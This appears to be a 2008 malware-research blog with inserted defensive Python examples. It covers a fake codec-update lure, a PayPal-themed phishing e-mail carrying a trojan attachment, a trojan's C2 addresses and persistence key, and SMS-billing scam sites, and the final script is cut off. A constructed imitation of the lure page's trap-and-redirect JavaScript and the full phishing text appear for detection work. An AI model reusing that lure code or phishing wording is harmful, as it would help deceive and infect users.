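Before looking at what the download contains, here is a small heuristic scanner for pages built like the one above. It is an added example written for this post, not code from the lure page or from hpHosts. It looks for the traits visible in that source: an onbeforeunload handler assigned as a string that re-prompts whoever tries to leave, confirm()/alert() prompts that call each other, every button (Ok, Cancel, Continue, the fake player image) wired to the same redirect function, and the "codec" wording. The two HTML samples inside it are constructed: the first is a shortened imitation of the lure page, the second a benign form for comparison.

```python
"""Heuristic scanner for fake "codec update" lure pages (added example)."""
import re
from collections import Counter

# Constructed sample modelled on the lure page quoted above (not the original file).
LURE_HTML = """
<script>
function openCodec(){ location.href = "/cd/wmcodec_update.exe"; }
function simpleRedirect(){ openCodec(); }
function alertInstall(){ alert("Windows Media Player Error\\nPlease, click 'OK' for Upgrade Windows Media Player Codec Library."); openCodec(); }
function askInstall(){ if (confirm("Windows Media Player Error")) simpleRedirect(); else alertInstall(); }
function docLoad(){ document.body.onbeforeunload="askInstall();return false"; }
</script>
<input type="button" onclick="simpleRedirect()" value="  Ok  " />
<input type="button" onclick="simpleRedirect();" value="  Cancel  " />
<input type="button" onclick="simpleRedirect()" value="  Continue  " />
<img src="/img/prev_1_0.png" onclick="simpleRedirect();" />
"""

# Constructed benign page: two buttons, two different handlers, no prompts.
BENIGN_HTML = """
<form action="/save"><input type="button" onclick="save()" value="Save" />
<input type="button" onclick="cancel()" value="Cancel" /></form>
"""

ONCLICK_RE = re.compile(r'onclick\s*=\s*"([^"]*)"', re.I)
LEAVE_TRAP_RE = re.compile(r'onbeforeunload\s*=\s*"[^"]*return\s+false', re.I)
PROMPT_RE = re.compile(r'\b(confirm|alert)\s*\(', re.I)
LURE_WORDS = ("codec", "windows media player", "upgrade")


def handler_name(code: str) -> str:
    """Reduce an onclick body such as 'simpleRedirect();' to the function it calls."""
    m = re.match(r'\s*([A-Za-z_$][\w$]*)\s*\(', code)
    return m.group(1) if m else code.strip()


def scan(html: str) -> dict:
    """Return the lure indicators found in a page, keyed by indicator name."""
    lowered = html.lower()
    indicators = {}

    # Every clickable control routed to one function: no choice is really offered.
    handlers = Counter(handler_name(h) for h in ONCLICK_RE.findall(html))
    if len(handlers) == 1 and sum(handlers.values()) >= 3:
        indicators["all_controls_same_handler"] = next(iter(handlers))

    # A string-assigned onbeforeunload returning false re-prompts anyone leaving.
    if LEAVE_TRAP_RE.search(html):
        indicators["leave_page_trap"] = True

    # Two or more confirm()/alert() calls: the page nags until the download is accepted.
    prompts = len(PROMPT_RE.findall(html))
    if prompts >= 2:
        indicators["prompt_chain"] = prompts

    found = [w for w in LURE_WORDS if w in lowered]
    if found:
        indicators["lure_wording"] = found

    return indicators


def is_lure(html: str, threshold: int = 3) -> bool:
    """Flag a page when at least `threshold` independent indicators are present."""
    return len(scan(html)) >= threshold


if __name__ == "__main__":
    for name, doc in (("lure", LURE_HTML), ("benign", BENIGN_HTML)):
        print(name, is_lure(doc), scan(doc))
```

The threshold is deliberately a count of independent traits rather than a single keyword match, so a legitimate media page that merely mentions codecs does not trip it on its own.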

Extraction of the executable failed whilst it was named .exe, so I tried renaming it to .zip (Universal Extractor identified it as a 7-zip file), and voilà - I could extract it. The following are its contents;


*****************************************************
Ur I.T. Mate Group Intranet
http://mysteryfcm.co.uk

This file has been generated by QFScript v1.0 Revision 3
Author: Steven Burn - Ur I.T. Mate Group owner
Homepage: www.it-mate.co.uk

File index for: mylot_com\alldebt_biz_-_theprivatetube_com
*****************************************************
DATE/TIME - MD5 - FILE/FOLDER
25/09/2008 04:03:30     d96fa963dbabb94bb60fc38ded67cc7f     alldebt_biz_-_theprivatetube_com
25/09/2008 04:04:20     21a7031dde9bdb27f07f5fcfa58bd905     alldebt_biz_-_theprivatetube_com\wmcodec_update.exe
25/09/2008 04:14:06     89f3c6308bce5f634dfc374499b3a1a9     alldebt_biz_-_theprivatetube_com\wmcodec_update
25/09/2008 04:14:10     825f37247eaef9006448dc5d0265aa29     alldebt_biz_-_theprivatetube_com\wmcodec_update\$R0
25/09/2008 04:16:16     4119d31ea7da45cf0d9a6f9961918038     alldebt_biz_-_theprivatetube_com\wmcodec_update\script.bin
25/09/2008 04:16:20     8cfcf8ed20ed00fd6f80eabc6a8b321a     alldebt_biz_-_theprivatetube_com\wmcodec_update\ýŠ€
25/09/2008 04:16:20     307f3492345535f4d6d5ce2637c8341b     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir
25/09/2008 04:16:20     8cfcf8ed20ed00fd6f80eabc6a8b321a     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir\ýŠ€
25/09/2008 04:16:20     5680520d33b4175681abf3138a5ecfd6     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir\sx2_77000560.exe
25/09/2008 04:16:20     173ffeaf2e189bc76e476b255559b41a     alldebt_biz_-_theprivatetube_com\wmcodec_update\$PLUGINSDIR
25/09/2008 04:16:20     8183cd31665faaf5a7d7f5fa4d54e57b     alldebt_biz_-_theprivatetube_com\wmcodec_update\$PLUGINSDIR\System.dll
*****************************************************
3 folders, 7 files
*****************************************************


Sadly, detection for sx2_77000560.exe is rather pitiful, with only 2/36 actually detecting it;

http://www.virustotal.com/analisis/4df5fd8178baf3f313854d2839309eb5

The ýŠ€ and $R0 entries are all 0-byte files ........ Sadly, Universal Extractor, whilst again identifying sx2_77000560.exe as a 7-zip file, could not actually extract it.

Looking through the wmcodec_update.exe executable shows some interesting content too. For example, it contains the following URL references;

http://meta38.com/service/index.php
http://linker15.cn/service/index.php



Both URLs return the same content;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://meta38.com/service/index.php
Server IP: 200.63.45.51 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 04:29:43:29
*****************************************************************
<root>
<serviceurls>
<serviceurl>http://meta38.com/service/index.php</serviceurl>
<serviceurl>http://linker15.cn/service/index.php</serviceurl>
</serviceurls>
<feedurls>
<feedurl>http://bestsearch3.com/feed/get.php</feedurl>
<feedurl>http://bestsearch4.com/feed/get.php</feedurl>
</feedurls>
</root>


bestsearch3.com and bestsearch4.com, both failed to return anything useful.

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://bestsearch3.com/feed/get.php
Server IP: 200.63.45.51 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 04:33:04:33
*****************************************************************
<?xml version="1.0" encoding="UTF-8" ?>
<result>
</result>
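The two documents above are what the downloader is given: a list of service and feed URLs, and then an empty feed. As an added example (not part of the post, and not the malware's own code), this parses both with the standard library, pulls every hostname out of the configuration for blocklisting, and reports an empty feed as exactly that rather than mistaking it for a successful result. The XML is copied from the vURL output above.

```python
"""Parse the downloader's service configuration and feed responses (added example)."""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Copied from the vURL output for meta38.com above.
SERVICE_XML = """<root>
<serviceurls>
<serviceurl>http://meta38.com/service/index.php</serviceurl>
<serviceurl>http://linker15.cn/service/index.php</serviceurl>
</serviceurls>
<feedurls>
<feedurl>http://bestsearch3.com/feed/get.php</feedurl>
<feedurl>http://bestsearch4.com/feed/get.php</feedurl>
</feedurls>
</root>"""

# Copied from the vURL output for bestsearch3.com above: an empty feed.
FEED_XML = """<?xml version="1.0" encoding="UTF-8" ?>
<result>
</result>"""


def parse_service_config(xml_text: str) -> dict:
    """Return {'service': [...], 'feed': [...]} URL lists from a <root> config."""
    root = ET.fromstring(xml_text)
    if root.tag != "root":
        raise ValueError(f"unexpected root element <{root.tag}>")
    return {
        "service": [e.text.strip() for e in root.iterfind("serviceurls/serviceurl") if e.text],
        "feed": [e.text.strip() for e in root.iterfind("feedurls/feedurl") if e.text],
    }


def feed_entries(xml_text: str) -> list:
    """Tag names of the children of a <result> feed; an empty list means nothing was served."""
    root = ET.fromstring(xml_text)
    if root.tag != "result":
        raise ValueError(f"unexpected root element <{root.tag}>")
    return [child.tag for child in root]


def hosts_for_blocklist(config: dict) -> list:
    """Sorted, de-duplicated hostnames from every URL in the config."""
    hosts = {urlsplit(u).hostname for urls in config.values() for u in urls}
    return sorted(h for h in hosts if h)


if __name__ == "__main__":
    cfg = parse_service_config(SERVICE_XML)
    print("service:", cfg["service"])
    print("feed:", cfg["feed"])
    print("block:", hosts_for_blocklist(cfg))
    print("feed entries:", feed_entries(FEED_XML))
```

Checking the root element name before reading anything is what turns an unexpected or empty response into a visible error instead of a silently empty list.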

Your Pay Pal Account May Be Compromised

I'm used to getting PayPal phishing scams; that's certainly nothing new. However, I've not had one of these in a while - a PayPal infection scam. Unlike your run-of-the-mill phish, this doesn't include any links to third-party servers (other than PayPal themselves), but instead includes an attachment (you know what's coming).

The e-mail itself is pretty straightforward, simply stating;

Dear member,
As part of our security measures, we regularly screen activity in the PayPal system.

We have reason to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection. Please review the report that we have attached to this email to see who accessed your account and contact us promptly if anything is unusual.

Case ID Number: PP-854-512-134

Thank you for your patience as we work together to protect your account.

PayPal Account Review Department
PayPal Email ID PP2310


The attachment is a 324K zip named account-1407A4-report.zip (MD5: 713885a1432fc4a822f9473828045952); I've no doubt the alphanumeric part is randomized - they usually are. Avira flagged this one as TR/Crypt.XDR.Gen, and running it through VT showed pretty bad results;

http://www.virustotal.com/analisis/a339e57900d936a58d8fa970d7de6977

... a measly 19/32 have detections for it.

Exported by: Outlook Export v0.1.2


From: security@paypal(dot)com
E-mail:security@paypal(dot)com [ 66.211.168.193 - node-66-211-168-193.networks.paypal(dot)com ]
Date: 24/09/2008 14:23:39
Subject: Your Pay Pal Account May Be Compromised
**************************************************************************
Links
**************************************************************************

Link: https://www.paypal(dot)com/us
Domain: www.paypal(dot)com
IP: 66.211.168.193 [ node-66-211-168-193.networks.paypal(dot)com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: hxxp://images.paypal(dot)com/en_US/i/scr/pixel.gif
Domain: images.paypal(dot)com
IP: 66.211.168.128 [ images.paypal(dot)com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
PayPal <https://www.paypal(dot)com/us>
src=http://images.paypal(dot)com/en_US/i/scr/pixel.gif
src=http://images.paypal(dot)com/en_US/i/scr/pixel.gif
Dear member,
As part of our security measures, we regularly screen activity in the PayPal system.

We have reason to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection. Please review the report that we have attached to this email to see who accessed your account and contact us promptly if anything is unusual.

Case ID Number: PP-854-512-134






Thank you for your patience as we work together to protect your account.

PayPal Account Review Department
PayPal Email ID PP2310


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>PayPal <<A HREF="https://www.paypal(dot)com/us">https://www.paypal(dot)com/us</A>>     <BR>
src=<A HREF="http://images.paypal(dot)com/en_US/i/scr/pixel.gif">http://images.paypal(dot)com/en_US/i/scr/pixel.gif</A>     <BR>
src=<A HREF="http://images.paypal(dot)com/en_US/i/scr/pixel.gif">http://images.paypal(dot)com/en_US/i/scr/pixel.gif</A>     <BR>
Dear member,   <BR>
As part of our security measures, we regularly screen activity in the PayPal system.<BR>
<BR>
We have reason to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection. Please review the report that we have attached to this email to see who accessed your account and contact us promptly if anything is unusual.<BR>
<BR>
Case ID Number: PP-854-512-134<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
Thank you for your patience as we work together to protect your account.<BR>
<BR>
PayPal Account Review Department       <BR>
PayPal Email ID PP2310 <BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <security@paypal(dot)com>
Delivered-To: services@[ITM]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-72.livemail.co.uk (Postfix) with SMTP id 4BB7166E6C5
for <services@[ITM]>; Wed, 24 Sep 2008 14:19:06 +0100 (BST)
Received: from paypal(dot)com (rrcs-24-123-221-42.central.biz.rr.com [24.123.221.42])
by smtp-in-72.livemail.co.uk (Postfix) with ESMTP id C661766E71A
for <hphosts@[ITM]>; Wed, 24 Sep 2008 14:18:49 +0100 (BST)
From: security@paypal(dot)com
To: hphosts@[ITM]
Subject: Your Pay Pal Account May Be Compromised
Date: Wed, 24 Sep 2008 09:23:39 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0011_AA8C3ED1.95BE0846"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <20080924131849.C661766E71A@smtp-in-72.livemail.co.uk>
X-Original-To: hphosts@[ITM]

Next hpHosts update

Just a note folks: the next update - as long as nothing else goes wrong (had the mail server go down today, and my laptop is now playing silly buggers) - will hopefully be out by Saturday.

Monday, 22 September 2008

Exclusive photos, you'll be happy!

HA! happy if you like your computer infected with trojans (TR/Dldr.Small.ADMM to be exact) perhaps .....

http://www.virustotal.com/analisis/baccc58a407108294e1d9e245ca75273

This trojan creates a file called rs32net.exe in the %system% folder (generally C:\Windows\System for 9x, System32 for 2000 and above), and connects to the following on port 80;

216.195.56.22
208.66.195.71
208.66.195.15

... it also, rather kindly, creates an entry in the registry so it runs each time the computer boots;

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rs32net

The e-mail seems to want to both insult us younger folk (heh!) and keep things as short as possible, simply stating;

Hello, old chap.

Watch my tits!

Thanks.


Ah the joys .....

Exported by: Outlook Export v0.1.2


From: Rodney Estrada
E-mail:seamus.danby@acg-wien.at [ 80.243.163.49 - www29.world4you.com ]
Date: 23/09/2008 03:24:48
Subject: Exclusive photos, you'll be happy
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
Hello, old chap.

Watch my tits!

Thanks.


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>Hello, old chap.<BR>
<BR>
Watch my tits!<BR>
<BR>
Thanks.<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <seamus.danby@acg-wien.at>
Delivered-To: services@[RMVD]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-165.livemail.co.uk (Postfix) with SMTP id 97ACFEB0098
for <services@[RMVD]>; Tue, 23 Sep 2008 03:24:55 +0100 (BST)
Received: from ip-154-105-net.express.net.id (ip-154-105-net.express.net.id [203.153.105.154])
by smtp-in-165.livemail.co.uk (Postfix) with ESMTP id 0272DEB0098
for <jane@[RMVD]>; Tue, 23 Sep 2008 03:24:52 +0100 (BST)
Received: from [203.153.105.154] by mail.acg-wien.at; Tue, 23 Sep 2008 10:24:48 +0800
Message-ID: <01c91d66$9aef1800$9a6999cb@seamus.danby>
From: "Rodney Estrada" <seamus.danby@acg-wien.at>
To: <jane@[RMVD]>
Subject: Exclusive photos, you'll be happy
Date: Tue, 23 Sep 2008 10:24:48 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0006_01C91D66.9AEF1800"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.71.2244.8
X-MimeOLE: Produced By Microsoft MimeOLE V4.71.2244.8
X-Original-To: jane@[RMVD]
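The headers of both this e-mail and the "PayPal" one above tell the same story once you read the Received chain from the top down: the first hop that our own server recorded came from a host that has nothing to do with the claimed sender. Here is an added example (mine, not part of the post) that does that check with the standard library. It parses the two header blocks as quoted in the posts, keeping the "(dot)" defanging and the [ITM]/[RMVD] redactions; the only change is that the folded Received lines are indented with a tab again, since the export flattened them. It finds the first non-loopback hop recorded by a trusted server (assumed here to be anything under livemail.co.uk), compares the HELO name and the From: domain against the reverse DNS of the connecting host, and counts any Received lines below that hop as sender-supplied, since our server never saw them.

```python
"""Compare the trusted Received hop of a message with its claimed sender (added example)."""
import re
from email import message_from_string
from email.utils import parseaddr

# Headers as quoted in the "PayPal" post above (defanged, redacted, re-folded with tabs).
PAYPAL_HEADERS = """Return-Path: <security@paypal(dot)com>
Delivered-To: services@[ITM]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
\tby smtp-in-72.livemail.co.uk (Postfix) with SMTP id 4BB7166E6C5
\tfor <services@[ITM]>; Wed, 24 Sep 2008 14:19:06 +0100 (BST)
Received: from paypal(dot)com (rrcs-24-123-221-42.central.biz.rr.com [24.123.221.42])
\tby smtp-in-72.livemail.co.uk (Postfix) with ESMTP id C661766E71A
\tfor <hphosts@[ITM]>; Wed, 24 Sep 2008 14:18:49 +0100 (BST)
From: security@paypal(dot)com
To: hphosts@[ITM]
Subject: Your Pay Pal Account May Be Compromised
Date: Wed, 24 Sep 2008 09:23:39 -0400

"""

# Headers as quoted in the "Exclusive photos" post above.
PHOTOS_HEADERS = """Return-Path: <seamus.danby@acg-wien.at>
Delivered-To: services@[RMVD]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
\tby smtp-in-165.livemail.co.uk (Postfix) with SMTP id 97ACFEB0098
\tfor <services@[RMVD]>; Tue, 23 Sep 2008 03:24:55 +0100 (BST)
Received: from ip-154-105-net.express.net.id (ip-154-105-net.express.net.id [203.153.105.154])
\tby smtp-in-165.livemail.co.uk (Postfix) with ESMTP id 0272DEB0098
\tfor <jane@[RMVD]>; Tue, 23 Sep 2008 03:24:52 +0100 (BST)
Received: from [203.153.105.154] by mail.acg-wien.at; Tue, 23 Sep 2008 10:24:48 +0800
From: "Rodney Estrada" <seamus.danby@acg-wien.at>
To: <jane@[RMVD]>
Subject: Exclusive photos, you'll be happy
Date: Tue, 23 Sep 2008 10:24:48 +0800

"""

# Postfix form: "from HELO (rdns [ip]) by server ..."
HOP_RE = re.compile(r"from (.+?) \((\S+) \[([\d.]+)\]\) by (\S+)")


def refang(s: str) -> str:
    """Undo the blog's (dot) defanging so names can be compared."""
    return s.replace("(dot)", ".")


def registered_domain(host: str) -> str:
    """Last two labels of a host name. A simplification: no public-suffix list is consulted."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def received_hops(raw: str) -> list:
    """Received header values, newest first, with folding whitespace collapsed."""
    msg = message_from_string(raw)
    return [" ".join(v.split()) for v in msg.get_all("Received", [])]


def first_external_hop(hops: list, trusted_suffix: str):
    """First non-loopback hop recorded by one of our own servers, or None."""
    for i, flat in enumerate(hops):
        m = HOP_RE.search(flat)
        if not m:
            return None  # not in the form our servers write: stop trusting the chain
        helo, rdns, ip, by = m.groups()
        if not by.endswith(trusted_suffix):
            return None  # recorded by a server we do not control
        if ip.startswith("127."):
            continue  # the local content filter hop
        return {"index": i, "helo": refang(helo), "rdns": rdns, "ip": ip, "by": by}
    return None


def assess(raw: str, trusted_suffix: str = "livemail.co.uk") -> list:
    """Human-readable findings about the sender claims versus the recorded hop."""
    msg = message_from_string(raw)
    hops = received_hops(raw)
    hop = first_external_hop(hops, trusted_suffix)
    if hop is None:
        return ["no hop recorded by a trusted server; chain cannot be verified"]
    from_domain = parseaddr(refang(msg.get("From", "")))[1].rsplit("@", 1)[-1].lower()
    rdns_dom = registered_domain(hop["rdns"])
    findings = []
    if registered_domain(hop["helo"]) != rdns_dom:
        findings.append(f"HELO name {hop['helo']} does not match reverse DNS {hop['rdns']} ({hop['ip']})")
    if registered_domain(from_domain) != rdns_dom:
        findings.append(f"From: domain {from_domain} does not match connecting host {hop['rdns']} ({hop['ip']})")
    untrusted = len(hops) - hop["index"] - 1
    if untrusted:
        findings.append(f"{untrusted} Received line(s) below the first trusted hop were supplied by the sender and cannot be verified")
    return findings


if __name__ == "__main__":
    for label, raw in (("paypal", PAYPAL_HEADERS), ("photos", PHOTOS_HEADERS)):
        print(label)
        for line in assess(raw):
            print("  -", line)
```

The rule the code encodes is the one worth remembering: only the Received lines written by servers you control are evidence; everything beneath the first of them, such as the "by mail.acg-wien.at" line in the second message, arrived inside the message and could say anything.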


Sunday, 21 September 2008

fSpamList.com Users - There's a new support forum for you!

I've been speaking to Josh, who runs fSpamList.com, and we've set up a new support forum for those who use his database and may require help with it, along, of course, with those who are listed (IP, username or e-mail) and would like to request removal.

The support forums are located at the hpHosts Support Forums, and require free registration before being allowed to post (for obvious reasons).

fSpamList Support
http://forum.hosts-file.net/viewforum.php?f=63

In addition to this, with the help of SysAdMini (MalwareDomainList), I've also modified a PHP script written by Smurf_Minions so that it can be used by those who would like to check e-mails/IPs/usernames not only against the SFS database, but against the fSpamList database as well;

[CODE] Querying the fSpamList and StopForumSpam databases
http://forum.hosts-file.net/viewtopic.php?f=64&t=737

Saturday, 20 September 2008

242 reasons to avoid 78.129.142.9 (RapidSwitch - AS29131)

I've got a little history with these chaps and chapesses, and it ain't good! It all started in February of this year, when I came across two scammy websites;

i-explorer.info
operasoft.info

The latter, thanks to the help of Stein Vråle and the legal/abuse folks at Opera, was shut down. The former, however, is still online to date. At the time, it was peddling what they claimed was Internet Explorer 7, but like goofull.com, wanted you to send them an SMS text that, surprise surprise, ended up with you paying through the nose. I did report them to RapidSwitch, for all the good it did - evidently RapidSwitch couldn't give a hoot as long as they're getting paid.

https://myservers.rapidswitch.com/Abuse/AbuseTicket.aspx?ticketid=VDNL-GOE-KQJF&key=rrgvsfteml

i-explorer.info is now peddling what they claim is Internet Explorer Pro 2.3.6 Final, and surprise surprise, you gotta pay them. As evidenced by the following in the installer's nsi.ini file;

You are using a Premium Download.\r\n\r\nTo continue you must get an activation code.



If you click to get an activation code, you are taken to (screenshot);

http://www.i-explorer.info/uk/check_code.php

Which has the lovely little disclaimer at the bottom;


You made a premium download. The server used to download this software needs that you send 3 ( total cost 6 pounds ) sms before installing on your computer. Please read Terms of Service for more info This charge is used to support the virus & spyware check team. Activating Download doesn't mean acquire a software license.


.... and nope, "Terms of Service" is not linkified - thar be nothing to click. The TOS is actually located at;

http://www.i-explorer.info/uk/condiciones.html

... and makes for interesting reading.

Surprisingly, if you go to i-explorer.info (the main homepage), you get redirected to /es and you get what actually seems to be IE 8 beta (this is also not a good thing, as I'm pretty sure Microsoft don't allow distribution of their betas), packaged in a 7zip file. I'll have to do a comparison with the official IE 8 beta from Microsoft to see if they've added/modified anything.

Alas however, this is just one of the sites on this IP, there are many others - and the theme remains the same. i-explorer.net for instance, peddles what they claim is Internet Explorer 8.0.6001.18241 Beta 2 (XP), and leads you to download;

http://www.i-explorer.net/uk/install_IE8WindowsXPx86ENU.exe.exe

Unlike i-explorer.info/es, this definitely isn't the official Microsoft beta, as evidenced by the same thing as previously referenced appearing in the installer's nsi.ini file (the screenshot above is the same theme that appears here).

Once again, you are led to the following in order to pay them;

http://www.i-explorer.net/uk/check_code.php

... which has the same disclaimer as i-explorer.info.

To view the full list of domains running this scam (or at least, those I've got in the hpHosts database), see;

http://hosts-file.net/pest.asp?show=78.129.142.

So what of RapidSwitch? Well, I tried calling, I tried e-mailing, and eventually the RS MD called me to tell me they'd now banned my e-mail address from contacting them - which I found hilarious. His reason? I had apparently registered on their system as a customer.

Er nope .... I sent an e-mail to support@rapidswitch.com and sales@rapidswitch.com, as sending it to abuse@ created duplicate tickets.

After the call, I sent them the following;

Dear Sir/Madam,
First and foremost, I would like to complain about the way in which you handle people that telephone yourselves.

Telling me you cannot deal with me over the phone is bad enough, but to also tell me you cannot give me a contact e-mail address (that will NOT result in yet another new ticket being created) over the phone is just taking the mick (which incidentally, is why I'm sending this to both of the e-mail addresses on your contact page). I've already sent an e-mail to your abuse department concerning this, and it created a duplicate ticket, which is why I was calling.

Secondly, I would like to complain about the way your company deals with complaints. I reported one of your customers running sites which are clearly illegal, and if you have such, should be against your terms of service.

Since I have not had a response on the ticket since the 11th, I decided to call this morning - to be told you would not deal with me over the phone. I've provided you with evidence of the illegal activity, and am disgusted that you have allowed the sites to stay online, and have further allowed your client not to respond.

Original:
https://myservers.rapidswitch.com/Abuse/AbuseTicket.aspx?ticketid=VDNL-GOE-KQJF&key=rrgvsfteml

Duplicate:
https://myservers.rapidswitch.com/Abuse/AbuseTicket.aspx?ticketid=QFYX-DQU-SXNT&key=dzphkivozj

If contacting the appropriate authorities is the only way to get you to deal with this, then I will be more than happy to do so. Additionally, if you allow this type of activity to occur on your network, I will also do my best to ensure this practice is publicized.


... and their reply?

Steven,

We have a strict procedure for abuse complaints; please email abuse@rapidswitch.com

Thank you,

Regards,

Paul Tacey-Green
RapidSwitch Ltd
Tel: 020 7106 0730

RapidSwitch Ltd, Technical Building, Priors Way, Maidenhead, SL6 2HP


Woops! Seems Paul wasn't informed that;

1. My domain had been blocked (which itself begs the question of how my e-mail got through).
2. Sending an e-mail to abuse@ creates a ticket that, alas, may as well just be completely ignored; RapidSwitch themselves certainly aren't going to do anything.

Nevertheless, the fact these are still online, and that there have been more popping up since I reported the sites to them, simply proves that RapidSwitch couldn't give a hoot - they're getting paid. Thus my personal recommendation? Drop their entire range;


inetnum: 78.129.142.0 - 78.129.142.255
netname: Rapidswitch_9
descr: Rapidswitch Ltd
country: GB
admin-c: AR6363-RIPE
tech-c: AR6363-RIPE
status: ASSIGNED PA
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered

person: Abuse Robot
address: RapidSwitch Ltd
address: Technical Building
address: Priors Way
address: Maidenhead
address: SL6 2HP
phone: +44 (0)20 7106 0730
remarks: ******************************************************
remarks: * ABUSE REPORTS *
remarks: * E-mail: abuse@rapidswitch.com *
remarks: * https://myservers.rapidswitch.com/reportabuse.aspx *
remarks: * IMPORTANT: We are unable to accept abuse reports *
remarks: * any other way except the two methods listed above. *
remarks: ******************************************************
e-mail: abuse@rapidswitch.com
nic-hdl: AR6363-RIPE
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered

% Information related to '78.129.128.0/17AS29131'

route: 78.129.128.0/17
descr: RapidSwitch Ltd
origin: AS29131
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered

Friday, 19 September 2008

cr4nk.ws has gone!

It would seem the folks at DirectI/Logicboxes have taken the initiative and actually taken notice of the report I sent them, as the WhoIs for cr4nk.ws is now showing as suspended.

Domain Name: CR4NK.WS

Registrar Name: Directi Internet Solutions Pvt. Ltd. DBA PublicDomainRegistry.com
Registrar Email: tldadmin@logicboxes.com
Registrar Telephone: 832-295-1535
Registrar Whois: whois.publicdomainregistry.com

Registrant Name: See registrar info above
Registrant Email: See registrar info above

Administrative Contact Email: See registrar info above
Administrative Contact Telephone: See registrar info above

Domain Created: 2008-02-16
Domain Last Updated: 2008-09-19
Domain Currently Expires: 2009-02-16

Current Nameservers:

ns1.suspended-domain.com
ns2.suspended-domain.com


WhoIs server: whois.website.ws


References:

cr4nk.ws has moved to Hostfresh
http://hphosts.blogspot.com/2008/09/cr4nkws-has-moved-to-hostfresh.html

cr4nk.ws has moved to Hostfresh

Alas, they're still with DirectI, however, and they're still actively trying to exploit my servers (amongst other people's, of course), so I've fired off another abuse report (perhaps DirectI will actually shut them down this time?).

The new IP for cr4nk.ws is 116.50.15.114 (Hostfresh - AS23898), with the old IP address being 67.225.157.104, the latter of which, of course, is Liquid Web (AS32244).

inetnum: 116.50.8.0 - 116.50.15.255
netname: HOSTFRESH
descr: HostFresh
descr: Internet Service Provider
country: HK
admin-c: PL466-AP
tech-c: PL466-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-HK-HOSTFRESH
mnt-routes: MAINT-HK-HOSTFRESH
remarks: Please send Spam & Abuse report to
remarks: abuse@hostfresh.com
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20070307
source: APNIC

person: Piu Lo
nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
country: HK
changed: ipadmin@hostfresh.com 20071025
mnt-by: MAINT-HK-HOSTFRESH
source: APNIC
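Both this APNIC record and the RIPE records in the RapidSwitch post above give their ranges as inetnum start/end pairs, while a blocklist or firewall wants CIDRs. The following is an added example (mine, not from either post): it reads the whois text, abridged from the two posts, converts each inetnum to the minimal CIDR list with the standard library, picks up route objects as they are, and tells you which listed block a given address falls into. Nothing here is hpHosts' own tooling.

```python
"""Turn whois inetnum/route objects into CIDR blocks and match addresses (added example)."""
import ipaddress
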